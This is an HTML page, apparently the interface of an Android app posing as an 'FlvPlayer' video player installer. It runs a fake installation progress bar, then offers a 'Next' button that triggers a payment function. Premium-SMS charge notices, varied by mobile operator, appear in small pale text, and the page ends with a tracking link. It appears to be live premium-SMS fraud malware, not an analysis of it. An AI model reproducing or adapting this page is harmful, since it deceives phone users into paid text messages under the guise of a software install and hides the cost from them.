
<!DOCTYPE HTML>
<html>
	<head>
		<title></title>
	
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
		<link type="text/css" href="css/smoothness/jquery-ui-1.8.18.custom.css" rel="stylesheet" />	
		<script type="text/javascript" src="js/jquery-1.7.1.min.js"></script>
		<script type="text/javascript" src="js/jquery-s-0.1.min.js"></script>
		<script type="text/javascript" src="js/jquery-ui-1.8.18.custom.min.js"></script>
		<script type="text/javascript">
		
			var timeout  = 90;
			
			function timer(progress)
			{
				if(progress > 100)
				{
					
					$('#page1').css('display' , 'none');
					$('#page2').css('display' , 'block');
					
					return true;
				}
				
				$("#progressbar").progressbar('value' , progress);
				timeout = Math.floor((Math.random()*100)+1) + Math.floor((Math.random()*100)+1); 
				if(timeout > 130)
				{
					timeout = Math.floor(timeout * 3.7);
				}
				setTimeout('timer(' + (progress + 2) + ')' , timeout);
			}
			
			function initData()
			{
				
				$('#image').attr('height' , (screen.height - 240) > 170 ? 170 : (screen.height - 240));
				$('#image2').attr('height' , (screen.height - 240) > 170 ? 170 : (screen.height - 240));
				
				$("#progressbar").progressbar({value: 0});
				 
				if(androidInfo.match(/operator3/) == 'operator3' || androidInfo.match(/operator10/) == 'operator10'  ) 
				{
					if( androidInfo.match(/operator10/) == 'operator10')
					{
						$('#belarus').css('display' , 'block');
						$('#oferta-link').html('<div align="center"><span style="color:#dddddd;font-size:13px;">Нажимая кнопку «Далее» Вы подтверждаете согласие с условиями <a href="javascript:_oferta();">ПОЛЬЗОВАТЕЛЬСКОГО СОГЛАШЕНИЯ</a></span></div>');	

					} 
					else 
					{
						if(androidInfo.match(/operator3/) == 'operator3') {  }
						$('#oferta-link-meg').css('display' , 'block');
						$('#oferta-link').css('display' , 'none');
					
						$('#image').attr('height' , (screen.height - 240) > 85 ? 85 : (screen.height - 240));
						$('#image2').attr('height' , (screen.height - 240) > 85 ? 85 : (screen.height - 240));
					}
					
					
				}
				else
				{
					$('#oferta-link').html('<div align="center"><span style="color:#dddddd;font-size:13px;"><a href="javascript:_oferta()" style="color:#dddddd;font-size:13px;">Правила в меню</a></span></div>');	
				}
				
				if(androidInfo.match(/operator13/) == 'operator13') 
				{
					$('#oferta-link').html('<div align="center"><span style="color:#000000;font-size:13px;"><br>Услуга платная до 5 EUR <br> Нажимая кнопку «Далее» Вы подтверждаете согласие с условиями <a href="javascript:_oferta();">ПОЛЬЗОВАТЕЛЬСКОГО СОГЛАШЕНИЯ</a></span><br><br></div>');	
				}
				
				if(androidInfo.match(/operator2/) == 'operator2')
				{
					$('#oferta-link').html('<div align="center"><span style="color:#cccccc;font-size:12px;text-decoration:underline;"><a href="exit.html" style="color:#dddddd;font-size:13px;">Выход</a></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span style="color:#cccccc;font-size:12px;"><a href="javascript:_oferta()" style="color:#dddddd;font-size:13px;">Условия</a></span><br><span style="color:#cccccc;font-size:11px;">Стоимость сообщения не превышет 300 рублей. Требуется отправка от 1 до 3 сообщений.</span><br></div>');	
				}
			
				 
				timer(0);
				
			}

		</script>
		<style type="text/css">
			*[unselectable=on] {
			    -moz-user-select: none;
			    -o-user-select:none;
			    -khtml-user-select: none;
			    -webkit-user-select: none;
			    -ms-user-select: none;
			     user-select: none;
			}
			body{ font: 90% "Trebuchet MS", sans-serif; margin: 5px;}
			
			.ui-button { width:200px; font-size:20px;}
			
			
		</style>	
	</head>
	<body>
		<div id="layout" align="center">
			<div id="someinfo">
			</div>
			<div id="page1">
				<img src="images/logo.png" id="image">
				<br>
				<h1 >FlvPlayer</h1>
				<br>
				<p id="alimit"></p>
				<br>

				<p>Подождите идет установка.</p>
				<div id="progressbar"></div>
			</div>
			
			
			<div id="page2" style="display:none;">
			
				<img src="images/logo.png" id="image2">
				<br>
				
				<div class="ui-widget">
					<div class="ui-state-highlight ui-corner-all" style="margin-top: 20px; padding: 0 .7em;"> 
						<p>
						<strong>Установка</strong> <br>
						<span id="install-info_all">Вы согласны с условиями загрузки FlvPlayer. <br>Нажмите кнопку Далее</span>
						</p>
						
					</div>
				</div>
				<div id="belarus" style="display:none" align="center"><br>
					Чтобы продолжить, нажмите "Далее".<br>
					Последует отправка SMS. Стоимость 19900 руб. без НДС.<br>
				</div>
				<br>
				<a href="javascript:_payment()" class="button ui-state-hover">Далее</a>
				
				<div style="bottom:5px;position:absolute;width:100%;margin:-5px;" id="oferta-link"><div align="center" ><a href="javascript:_oferta()" style="color:#dddddd;font-size:13px;">Пользовательское соглашение</a></div></div>
				
				<div style="bottom:5px;position:absolute;width:100%;margin:-5px;bottom:20px;display:none;" id="oferta-link-meg">
					<div style="height:25px;width:90%;z-index:10000;" >
						<a href="javascript:_oferta()" style="color:#999999;font-size:17px;float:left;">Пользовательское соглашение</a>
						
						<a href="exit.html" style="color:#999999;font-size:17px;float:right;">Выход</a>	
						
					</div>
					
					<div align="center" style="color:#000000;font-size:13px;" id="paymentinfo">Услуга платная, не более 354р с НДС.</div>			
								
				</div>
			</div>
			
			
			<div id="page3" style="display:none;">
				<div class="ui-widget">
					<div class="ui-state-highlight ui-corner-all" style="padding: 0 .7em;"> 
						<p>
						<strong>Ваша ссылка:</strong> <br clear="all"><b>http://muroko2r.net/?u=89-46cg1im9ms99r10a8</b>.</p>
					</div>
				</div>	
				<br>
				<a href="openurl.html#url=http://muroko2r.net/?u=89-46cg1im9ms99r10a8;" class="button ui-state-hover">Перейти</a>		
			</div>
			
			
		</div>
	</body>
</html>


